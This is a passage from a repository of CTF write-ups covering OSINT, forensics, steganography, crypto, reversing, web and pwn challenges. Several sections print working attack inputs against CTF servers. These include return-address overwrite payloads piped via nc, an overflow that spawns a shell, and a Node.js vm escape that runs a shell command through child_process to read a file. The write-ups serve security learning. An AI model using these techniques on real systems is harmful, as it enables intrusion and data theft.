Image](https://lh3.googleusercontent.com/fife/ABSRlIoJz8F6GMMjVYrLh7-cfEAqrRP6IBO8BT0_U-KpvWxdHAdDinNBRhC6vyk6AvFPF_AG5XxRx1UqPOfLnTxNlEWSP16vLl2on5H5a20zpxfAkr6R8KvjLCQtLr2jJ9lbcg3Xz7tW9MU_ncKpKPImg4EVMETes96kX8uglzjz6NWm7XhpbXQenkFUDeyQOMuqFlArBeQCiAgNQ7RuQ55Tx-vWivYd-P1hnseWg1Xo_xhXBQ_XHKBqTUtchoOfG48wh3rQFcBVA2f7unJjI2bih2wk9CcicvOTKdKAT1Yfwzy_N-XzylVUxLm5ebZA8RlcU0m_Z6FRMNswDlQLt5I3OjSboiRkMwjqN1CKzUpzwO-pWZ0G9Pe_w7wmJpxv5lJ9228EdSPDNnZ-aWMfkGe0RaT94LY8AIUzMEX8PpCbk8zN6Cu9p4fRJbCus5DBw4jB6CNwL03pvFqnelgoBTKD82QKro07VmJ6Zg7NFjFBL_Iao7HsKYEZQcqdv23SZNEU1mTYbJfx8i8Lxv4KHuLMUftpJaTRR3lAMF-2lPVlml_yGxLvE7DE-OAti1y33-L5TPyYOwYPgpFDNYfHpbw21mENVC2r2eYnd27sL22-YkQycieXSlQANXJJX6Rqj8b0RpLy9NYd8qyKZ0SbY78-MVa2MapCyAhpTntsa3OArE2QDAM_CDHniZ9iK94NONdl0M0FGRKgSfseiaIlXYJL2oRiLNoz1W9OZ9A=w1346-h647-ft) 18 | 19 | From this we can gather 3 hints- 20 | ![Challenge_Image_Hints](https://i.imgur.com/eqi0WFe.png) 21 | 22 | 1. Name of the Ship - Freedom of Seas 23 | 2. Name of the ship owning company - RoyalCalCarribbean 24 | 3. 
Name of the bar - Rum Therapy 25 | 26 | After this I immediately went on to look up the route that this particular ship usually takes, with a simple google search I found this - [Route](https://www.cruisemapper.com/ships/Freedom-Of-The-Seas-654) 27 | 28 | This didn't help much so I went on to search the bar on google, since the top searches were mostly promotional I thought it would be better to just move to the map view where I saw 29 | ![Map View](https://i.imgur.com/m8dafEg.png) 30 | 31 | Since there were only 2 results I changed to 3d satellite view by dropping the marker on the bottom left near both locations, when I saw the 1st location 32 | 33 | ![Sat View](https://i.imgur.com/MseMAjY.png) 34 | the scene seemed very familiar to the original picture and if you zoom in a bit you'd see Antillia Brewing Company. Couldn't be a coincidence now... 35 | 36 | So I went on to submit the flag and I wrote this 37 | `UMDCTF-{Stlucia_Antillia}` 38 | 39 | Which was ofcourse incorrect, it was later after a lot of frustration I realised that Instead of St. Lucia I had to write the name of the city 40 | 41 | So finally the flag is 42 | `UMDCTF-{Castries_Antillia}` 43 | 44 | (This city name was also mentioned on the top left in the satellite view image that I included above) 45 | -------------------------------------------------------------------------------- /UMDCTF 2021/forensics/NotSlick.md: -------------------------------------------------------------------------------- 1 | # Not Slick - Forensics 2 | Author - [BlackJack](http://github.com/Mannan-Goyal) 3 | 4 | Requirements : Basic knowledge of Hex, the structure of png files and the magic number 5 | 6 | --- 7 | When we start to solve the challenge we are faced with a problem description which says - 8 | 9 | > My friend always messes with PNGs.... what did he do this time? 
10 | 11 | This gives us a pretty good idea about the png file being messed up 12 | 13 | After this I open the png file with a normal image viewer just to confirm the fact. 14 | Now I open the image with Bless Hex Editor, However u can use any hex editor of your choice. A list of popular hex editors can be found [here.](https://linuxhint.com/hex_editor_linux/) 15 | 16 | The magic number for a png file : ```89 50 4E 47 .PNG``` 17 | 18 | A list of magic numbers for different file types can be found [here.](https://asecuritysite.com/forensics/magic) 19 | 20 | After looking at the hex of the image 21 | ![Init Hex](https://i.imgur.com/5IdSmiT.png) 22 | 23 | I saw that the initial hex didn't match the magic number of png so I edited it to that but that didn't work 24 | 25 | Later, i realised when I scrolled to the bottom of the file 26 | ![End hex](https://i.imgur.com/xEewiKu.png) 27 | that the PNG and IHDR is inverted and hence the whole file was actually inverted 28 | 29 | So we wrote a python script to re-invert the file 30 | ```python 31 | f1 = open("notslick.png", "rb+") 32 | f2 = open("out.png", "wb+") 33 | f2.write(f1.read()[::-1]) 34 | f1.close() 35 | f2.close() 36 | ``` 37 | (Credits: [UnknownAbyss](https://github.com/unknownabyss)) 38 | 39 | After this when you open the image you find the flag which is - 40 | ![flag](https://i.imgur.com/TOprNZ6.png) 41 | (Disable Dark Mode to view image xD) 42 | 43 | ```UMDCTF-{abs01ute1y_r3v3r53d}``` 44 | -------------------------------------------------------------------------------- /UMDCTF 2021/stegnography/pickle_rick.md: -------------------------------------------------------------------------------- 1 | # Pickle Rick - Stegnography 2 | Author - [BlackJack](http://github.com/Mannan-Goyal) 3 | 4 | Requirements : binwalk, steghide or not 5 | 6 | --- 7 | When we start to solve the challenge we are faced with a problem description which says - 8 | 9 | > You recieve these audio files from someone named Alan Eliasen. 
10 | 11 | After reading this statement we get 2 key hints, one that we have to find hidden messages in audio files and a name - Alan Eliasen. 12 | 13 | If you google the name you'll reach [here.](https://futureboy.us/) 14 | 15 | Here given the category of the challenge we select Stegnography and then Decode an Image to reach [here.](https://futureboy.us/stegano/) 16 | 17 | ![Upload](https://i.imgur.com/m3xP0kS.png) 18 | 19 | After this we uploaded the ```together-forever-encoded.wav``` file in the decoder, we get the following string displayed - 20 | 21 | ```The password is "big_chungus"!``` 22 | 23 | Now we upload the 2nd file to the website but this time instead of leaving the password field empty we put big_chungus there. 24 | 25 | The following is obtained- 26 | ```UMDCTF-{n3v3r_g0nna_l3t_y0u_d0wn}``` 27 | which is the required flag. 28 | 29 | The above method was suggested later by [Rakesh](https://github.com/Rakesh1772) but to solve the challenge earlier I had used steghide, the commands I ran are listed below 30 | 31 | ```bash 32 | steghide extract -sf together-forever-encoded.wav 33 | steghide extract -sf rickroll.wav 34 | ``` 35 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Command 1/README.md: -------------------------------------------------------------------------------- 1 | # Command 1 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is an alternate solution to this challenge. The intended solution is not written here. 6 | 7 | # Requirements 8 | 9 | - None 10 | 11 | # Source 12 | 13 | - [command_1](./command_1) 14 | 15 | # Exploitation 16 | 17 | The challenge was intended to be a binary exploit challenge, however, due to a small issue, there was another bug in it. So, when you decompile the code using `ghidra`, you see that the `Add command` option uses `strstr` to block certain strings in the input. But, the same ones are not blocked in the `Edit command` option. 
The solution seems simple :laugh:. 18 | 19 | solution 20 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Command 1/command_1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Command 1/command_1 -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Command 1/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Command 1/static/img1.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/README.md: -------------------------------------------------------------------------------- 1 | # Free Flag 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge where you have to overwrite the return pointer. 6 | 7 | # Requirements 8 | 9 | - GDB 10 | - Knowledge of Function Stack, Return Pointer 11 | 12 | # Source 13 | 14 | - [chall](./chall) 15 | 16 | # Exploitation 17 | 18 | This is a classic buffer overflow challenge. The flag is in a file on the server, and a binary is given to you ([chall](./chall)). Fire up GDB, and check out the main function using `disas main`. 19 |
20 | 21 | pdisas main 22 | 23 | You see a function called `here`. We check it out using `disas here`. 24 |
25 | 26 | pdisas here 27 | 28 | In this you see a call to the `read` function. Also, when you do `info functions`, notice there is a function called `win_win`. Let's check that out. 29 |
30 | 31 | flag 32 | 33 | So the `win_win` function has a call to `system`, looks like this is our target function. If we can run this somehow, we get the flag. So we try to overwrite the return pointer in the `here` function. You see that the size of the stack is `0x20` or `32`. We need to add 8 more bytes to overwrite the saved base pointer, making it 40. Then, the return pointer must be overwritten in little endian to the `win_win` function. Let's write the payload. 34 | 35 | ```bash 36 | python2 -c "print('a'*(32+8) + '\x08\x07\x40\x00\x00\x00\x00\x00')" 37 | ``` 38 | 39 | This can now be piped to the server to get the flag. The hard-coded address (`0x400708` written little-endian) only works because the binary is loaded at a fixed address, i.e. it is not position-independent — check with `checksec` before reusing this approach elsewhere. If the jump reaches `win_win` but `system` crashes on a `movaps` instruction, the stack is misaligned on entry; put the address of a lone `ret` gadget before the `win_win` address to restore 16-byte alignment. 40 | 41 | ```bash 42 | python2 -c "print('a'*40 + '\x08\x07\x40\x00\x00\x00\x00\x00')" | nc asia.pwn.zh3r0.ml 3456 43 | ``` 44 | 45 | flag 46 | 47 | The flag is: 48 | 49 | ``` 50 | zh3r0{welcome_to_zh3r0_ctf} 51 | ``` -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/chall -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img1.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img2.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img3.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img3.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img4.png -------------------------------------------------------------------------------- /Zh3r0 CTF/README.md: -------------------------------------------------------------------------------- 1 | # Zh3r0 CTF 2 | 3 | - Official URL: https://ctf.zh3r0.ml/ 4 | - Format: Jeopardy 5 | - Duration: Mon, 15 June 2020, 21:00 IST — Wed, 17 June 2020, 21:00 IST -------------------------------------------------------------------------------- /Zh3r0 CTF/Reversing/snakes everywhere/guess.py: -------------------------------------------------------------------------------- 1 | flag = 'zh3ro{fake flag}' 2 | key = 'I_l0v3_r3v3r51ng' 3 | 4 | # flag size is 38 5 | 6 | def xor(str1, str2): 7 | return chr(ord(str1)^ord(str2)) 8 | 9 | ciphertext = '' 10 | 11 | for i in range(len(flag)//3): 12 | ciphertext += chr(ord(key[i]) * ord(flag[i]) - i) 13 | 14 | 15 | for i in range(len(flag)//3, len(flag)//3 * 2): 16 | ciphertext += chr( ord(flag[i]) * ord(key[i%len(key)]) + i) 17 | 18 | for i in range(len(key)//2, len(flag)): 19 | ciphertext += xor(key[i%16], flag[i]) 20 | 21 | file = open('ciphertext.txt', 'w') 22 | print(len(ciphertext)) 23 | 24 | file.write(ciphertext) 25 | file.close() 26 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Reversing/snakes everywhere/rev.py: -------------------------------------------------------------------------------- 1 | def xor(str1, str2): 2 | return 
chr(ord(str1)^ord(str2)) 3 | 4 | flag = [None]*38 5 | key = 'I_l0v3_r3v3r51ng' 6 | 7 | ciphertext = open('snake.txt').read() 8 | 9 | k = len(ciphertext) - (len(flag) - len(key)//2) 10 | 11 | for i in range(len(key)//2, len(flag)): 12 | flag[i] = xor(key[i%16], ciphertext[k]) 13 | k += 1 14 | 15 | for i in range(len(flag)//3, len(flag)//3 * 2): 16 | flag[i] = chr((ord(ciphertext[i]) - i)//ord(key[i%len(key)])) 17 | 18 | 19 | for i in range(len(flag)//3): 20 | flag[i] = chr((ord(ciphertext[i]) + i)//ord(key[i])) 21 | 22 | print(''.join(flag)) -------------------------------------------------------------------------------- /Zh3r0 CTF/Reversing/snakes everywhere/snake.txt: -------------------------------------------------------------------------------- 1 | ⋊⚗ᖂᕝᘜ᡼ᶪ㗛᜔⿧ᘓヱᎷጱ⴬⹔᮹⪾ゖণ㉒᎛⠪㗹G\jU(,Q3 l@RCXCN -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/README.md: -------------------------------------------------------------------------------- 1 | # Challenge Name 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Brief Description 6 | 7 | # Requirements 8 | 9 | - PHP Local File Inclusion (LFI) 10 | 11 | # Source 12 | 13 | - http://web.zh3r0.ml:7777/ 14 | - The description on the website mentions `page` and `upload`. 15 | 16 | # Exploitation 17 | 18 | The first part of the challenge is a sort of vague guesswork. In the challenge description, there are two words - `page` and `upload` - which the author wants you to notice. Also, when you view the homepage source, it has a comment ``. 19 |
20 | 21 | comment 22 | 23 | So, the first try was to pass a query parameter called `page` in the URL. We tried to visit `http://web.zh3r0.ml:7777/?page=flag`. Here, we get a gif. 24 |
25 | 26 | Now, since the description had the word `upload` in it, we tried to checkout if there is a page called upload, and there was! 27 |
28 | 29 | upload 30 | 31 | Here, we can assume that we have to do some sort of local file inclusion. So we created a file called `payload.php` and tried to `ls` the directory. We saw a lot of files called `flag`, so we decided to print all the files and search in the browser. Here's the final payload: 32 | 33 | ```php 34 | 37 | ``` 38 | 39 | Now you can visit the route `/?page=payload` (the name of the file you uploaded). This gives a page with a lot of content. 40 |
41 | 42 | page 43 | 44 | So, the contents of all the files are now on the browser. All you have to do is open the source code and search for the flag format. 45 |
46 | 47 | flag 48 | 49 | The flag is: 50 | 51 | ``` 52 | zh3r0{h3y_d1d_y0u_upl04d_php_c0rr3ct1y???_84651320} 53 | ``` 54 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/payload.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img1.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img2.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img3.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img4.png -------------------------------------------------------------------------------- /redpwnCTF 2020/README.md: -------------------------------------------------------------------------------- 1 | # redpwnCTF 2020 2 | 3 | - 
Official URL: https://2020.redpwn.net/ 4 | - Format: Jeopardy 5 | - Duration: Mon, 22 June 2020, 01:30 IST — Fri, 26 June 2020, 01:30 IST -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/README.md: -------------------------------------------------------------------------------- 1 | # 12-shades-of-redpwn 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Color wheel, base 12. 6 | 7 | # Requirements 8 | 9 | - Base 12 10 | 11 | # Source 12 | 13 | - [ciphertext.jpg](./ciphertext.jpg) 14 | - [color-wheel.jpg](./color-wheel.jpg) 15 | 16 | # Exploitation 17 | 18 | Identify the colors from the ciphertext in the color-wheel, and use numbers 0-11 to write them (like in a clock). 19 | 20 | ``` 21 | 86 90 81 87 a3 49 99 43 97 97 41 92 49 7b 41 97 7a 44 92 7a 44 96 98 a5 22 | ``` 23 | 24 | These are basically the values in base 12. Convert them to base 10, and then treat the values obtained as ASCII. 25 | 26 | ```python 27 | >>> x = "86 90 81 87 a3 49 99 43 97 97 41 92 49 7b 41 97 7a 44 92 7a 44 96 98 a5" 28 | >>> ''.join(list(map(lambda i: chr(int(i,12)), x.split()))) 29 | 'flag{9u3ss1n9_1s^4n^4rt}' 30 | ``` 31 | 32 | Maybe we read some colors wrong? Replace the `^`s with `_`s. 33 |
34 | 35 | The flag is: 36 | 37 | ``` 38 | flag{9u3ss1n9_1s_4n_4rt} 39 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/ciphertext.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/crypto/12-shades-of-redpwn/ciphertext.jpg -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/color-wheel.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/crypto/12-shades-of-redpwn/color-wheel.jpg -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/sol: -------------------------------------------------------------------------------- 1 | 86 90 81 87 a3 49 99 43 97 97 41 92 49 7b 41 97 7a 44 92 7a 44 96 98 a5 2 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/4k-rsa/4k-rsa-public-key.txt: -------------------------------------------------------------------------------- 1 | n: 
5028492424316659784848610571868499830635784588253436599431884204425304126574506051458282629520844349077718907065343861952658055912723193332988900049704385076586516440137002407618568563003151764276775720948938528351773075093802636408325577864234115127871390168096496816499360494036227508350983216047669122408034583867561383118909895952974973292619495653073541886055538702432092425858482003930575665792421982301721054750712657799039327522613062264704797422340254020326514065801221180376851065029216809710795296030568379075073865984532498070572310229403940699763425130520414160563102491810814915288755251220179858773367510455580835421154668619370583787024315600566549750956030977653030065606416521363336014610142446739352985652335981500656145027999377047563266566792989553932335258615049158885853966867137798471757467768769820421797075336546511982769835420524203920252434351263053140580327108189404503020910499228438500946012560331269890809392427093030932508389051070445428793625564099729529982492671019322403728879286539821165627370580739998221464217677185178817064155665872550466352067822943073454133105879256544996546945106521271564937390984619840428052621074566596529317714264401833493628083147272364024196348602285804117877 2 | e: 65537 3 | c: 
3832859959626457027225709485375429656323178255126603075378663780948519393653566439532625900633433079271626752658882846798954519528892785678004898021308530304423348642816494504358742617536632005629162742485616912893249757928177819654147103963601401967984760746606313579479677305115496544265504651189209247851288266375913337224758155404252271964193376588771249685826128994580590505359435624950249807274946356672459398383788496965366601700031989073183091240557732312196619073008044278694422846488276936308964833729880247375177623028647353720525241938501891398515151145843765402243620785039625653437188509517271172952425644502621053148500664229099057389473617140142440892790010206026311228529465208203622927292280981837484316872937109663262395217006401614037278579063175500228717845448302693565927904414274956989419660185597039288048513697701561336476305496225188756278588808894723873597304279725821713301598203214138796642705887647813388102769640891356064278925539661743499697835930523006188666242622981619269625586780392541257657243483709067962183896469871277059132186393541650668579736405549322908665664807483683884964791989381083279779609467287234180135259393984011170607244611693425554675508988981095977187966503676074747171 4 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/base646464/README.md: -------------------------------------------------------------------------------- 1 | # base646464 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Base 64, base 64, base 64 ... 25 times. 6 | 7 | # Requirements 8 | 9 | - Basic Knowledge of Node.js 10 | 11 | # Source 12 | 13 | - [generate.js](./generate.js) 14 | - [cipher.txt](./cipher.txt) 15 | 16 | # Exploitation 17 | 18 | You have to decode base64 25 times. 
19 | 20 | ```javascript 21 | // Flag is base 64 encoded 25 times 22 | let ret = flag; 23 | for(let i = 0; i < 25; i++) ret = btoa(ret); 24 | ``` 25 | 26 | Of course, you can use bash XD: 27 | 28 | ```bash 29 | cat cipher.txt | base64 -d | base64 -d |base64 -d | base64 -d 30 | | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | ba 31 | se64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 32 | -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d 33 | | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d 34 | flag{l00ks_l1ke_a_l0t_of_64s} 35 | ``` 36 | 37 | You can use python too: 38 | 39 | ```python 40 | >>> f = open('cipher.txt').read() 41 | >>> import base64 42 | >>> for i in range(25): 43 | ... f = base64.b64decode(f) 44 | ... 45 | >>> print(f) 46 | b'flag{l00ks_l1ke_a_l0t_of_64s}' 47 | ``` 48 | 49 | The flag is: 50 | 51 | ``` 52 | flag{l00ks_l1ke_a_l0t_of_64s} 53 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/base646464/generate.js: -------------------------------------------------------------------------------- 1 | const btoa = str => Buffer.from(str).toString('base64'); 2 | 3 | const fs = require("fs"); 4 | const flag = fs.readFileSync("flag.txt", "utf8").trim(); 5 | 6 | let ret = flag; 7 | for(let i = 0; i < 25; i++) ret = btoa(ret); 8 | 9 | fs.writeFileSync("cipher.txt", ret); 10 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/pseudo-key/crack.py: -------------------------------------------------------------------------------- 1 | from string import ascii_lowercase 2 | 3 | chr_to_num = {c: i for i, c in enumerate(ascii_lowercase)} 4 | 5 | num_to_chr = {i: c for i, c in enumerate(ascii_lowercase)} 6 | ctxt = 'z_jjaoo_rljlhr_gauf_twv_shaqzb_ljtyut' 7 | pseudo_key = 'iigesssaemk' 8 | 9 | def get_key(pkey): 10 | x = '' 11 | y = '' 12 | for i in range(len(pkey)): 13 | c = chr_to_num[pkey[i]] 14 | x += 
num_to_chr[c/2] 15 | y += num_to_chr[(c+26)/2] 16 | print(x) 17 | print(y) 18 | 19 | get_key(pseudo_key) 20 | 21 | key = 'redpwwwnctf' 22 | 23 | def decrypt(ct, key): 24 | flag = '' 25 | key = ''.join(key[i % len(key)] for i in range(len(ct))).lower() 26 | for i in range(len(ct)): 27 | if ct[i] == '_': 28 | flag += '_' 29 | continue 30 | flag += num_to_chr[(chr_to_num[ct[i]] - chr_to_num[key[i]]) % 26] 31 | print(flag) 32 | decrypt(ctxt, key) -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/pseudo-key/pseudo-key-output.txt: -------------------------------------------------------------------------------- 1 | Ciphertext: z_jjaoo_rljlhr_gauf_twv_shaqzb_ljtyut 2 | Pseudo-key: iigesssaemk 3 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/pseudo-key/pseudo-key.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from string import ascii_lowercase 4 | 5 | chr_to_num = {c: i for i, c in enumerate(ascii_lowercase)} 6 | num_to_chr = {i: c for i, c in enumerate(ascii_lowercase)} 7 | 8 | def encrypt(ptxt, key): 9 | ptxt = ptxt.lower() 10 | key = ''.join(key[i % len(key)] for i in range(len(ptxt))).lower() 11 | ctxt = '' 12 | for i in range(len(ptxt)): 13 | if ptxt[i] == '_': 14 | ctxt += '_' 15 | continue 16 | x = chr_to_num[ptxt[i]] 17 | y = chr_to_num[key[i]] 18 | ctxt += num_to_chr[(x + y) % 26] 19 | return ctxt 20 | 21 | with open('flag.txt') as f, open('key.txt') as k: 22 | flag = f.read() 23 | key = k.read() 24 | 25 | ptxt = flag[5:-1] 26 | 27 | ctxt = encrypt(ptxt,key) 28 | pseudo_key = encrypt(key,key) 29 | 30 | print('Ciphertext:',ctxt) 31 | print('Pseudo-key:',pseudo_key) 32 | -------------------------------------------------------------------------------- /redpwnCTF 2020/misc/CaaSINO/README.md: -------------------------------------------------------------------------------- 1 | # Challenge 
Name 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Node.js `vm` module exploit. 6 | 7 | # Requirements 8 | 9 | - Node.js 10 | 11 | # Source 12 | 13 | - [calculator.js](./calculator.js) 14 | 15 | ``` 16 | Who needs regex for sanitization when we have VMs?!?! 17 | 18 | The flag is at /ctf/flag.txt 19 | 20 | nc 2020.redpwnc.tf 31273 21 | ``` 22 | 23 | # Exploitation 24 | 25 | Not all programs that run in `vm`s are isolated. When you run this program, it shows 26 | 27 | ``` 28 | Welcome to my Calculator-as-a-Service (CaaS)! 29 | This calculator lets you use the full power of Javascript for 30 | your computations! Try `Math.log(Math.expm1(5) + 1)` 31 | Type q to exit. 32 | > 33 | ``` 34 | 35 | Now, you can pass anything as a string and it will be executed in the `vm.runInNewContext()` function. 36 | 37 | ```javascript 38 | const result = vm.runInNewContext(input) 39 | process.stdout.write(result + '\n') 40 | ``` 41 | 42 | So, we can simply get the process, require the `child_process` module, and execute `cat /ctf/flag.txt`. 43 | 44 | ```javascript 45 | const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /ctf/flag.txt').toString() 46 | ``` 47 | 48 | The flag is: 49 | 50 | ``` 51 | flag{vm_1snt_s4f3_4ft3r_41l_29ka5sqD} 52 | ``` 53 | -------------------------------------------------------------------------------- /redpwnCTF 2020/misc/CaaSINO/calculator.js: -------------------------------------------------------------------------------- 1 | const vm = require('vm') 2 | const readline = require('readline') 3 | 4 | const rl = readline.createInterface({ 5 | input: process.stdin, 6 | output: process.stdout 7 | }) 8 | 9 | process.stdout.write('Welcome to my Calculator-as-a-Service (CaaS)!\n') 10 | process.stdout.write('This calculator lets you use the full power of Javascript for\n') 11 | process.stdout.write('your computations! 
Try `Math.log(Math.expm1(5) + 1)`\n') 12 | process.stdout.write('Type q to exit.\n') 13 | rl.prompt() 14 | rl.addListener('line', (input) => { 15 | if (input === 'q') { 16 | process.exit(0) 17 | } else { 18 | try { 19 | const result = vm.runInNewContext(input) 20 | process.stdout.write(result + '\n') 21 | } catch { 22 | process.stdout.write('An error occurred.\n') 23 | } 24 | rl.prompt() 25 | } 26 | }) 27 | -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-0/README.md: -------------------------------------------------------------------------------- 1 | # coffer-overflow-0 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge. 6 | 7 | # Requirements 8 | 9 | - Basic Buffer overflow. 10 | 11 | # Source 12 | 13 | - [coffer-overflow-0](./coffer-overflow-0). 14 | 15 | ``` 16 | Can you fill up the coffers? We even managed to find the source for you. 17 | 18 | nc 2020.redpwnc.tf 31199 19 | ``` 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main(void) 26 | { 27 | long code = 0; 28 | char name[16]; 29 | 30 | setbuf(stdout, NULL); 31 | setbuf(stdin, NULL); 32 | setbuf(stderr, NULL); 33 | 34 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 35 | puts("What do you want to fill your coffer with?"); 36 | 37 | gets(name); 38 | 39 | if(code != 0) { 40 | system("/bin/sh"); 41 | } 42 | } 43 | ``` 44 | 45 | # Exploitation 46 | 47 | The goal is clear, we have to somehow set a non-zero value in `code`. 48 |
49 | 50 | We see in the code snippet that `name` is allotted 16 bytes, and `code` is allotted 8 bytes (a `long` on 64-bit). Also, the `gets()` function is used, which performs no bounds check on the input. So, we can simply write past the space allotted for `name` and into `code`. 51 |
52 | 53 | Stack space is generally allocated in multiples of 16 bytes, so this function's frame will be 32 bytes. We can simply fill this with `a`s, each `a` being 1 byte, and fill up everything, thus changing the value of `code` as well. We get a shell. 54 | 55 | ```bash 56 | $ python2 -c "print 'a'*32" 57 | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 58 | 59 | $ nc 2020.redpwnc.tf 31199 60 | Welcome to coffer overflow, where our coffers are overfilling with bytes ;) 61 | What do you want to fill your coffer with? 62 | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 63 | ls 64 | Makefile 65 | bin 66 | coffer-overflow-0 67 | coffer-overflow-0.c 68 | dev 69 | flag.txt 70 | lib 71 | lib32 72 | lib64 73 | cat flag.txt 74 | flag{b0ffer_0verf10w_3asy_as_123} 75 | ``` 76 | 77 | The flag is: 78 | 79 | ``` 80 | flag{b0ffer_0verf10w_3asy_as_123} 81 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-0/coffer-overflow-0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/pwn/coffer-overflow-0/coffer-overflow-0 -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-0/coffer-overflow-0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | long code = 0; 7 | char name[16]; 8 | 9 | setbuf(stdout, NULL); 10 | setbuf(stdin, NULL); 11 | setbuf(stderr, NULL); 12 | 13 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 14 | puts("What do you want to fill your coffer with?"); 15 | 16 | gets(name); 17 | 18 | if(code != 0) { 19 | system("/bin/sh"); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-1/README.md: 
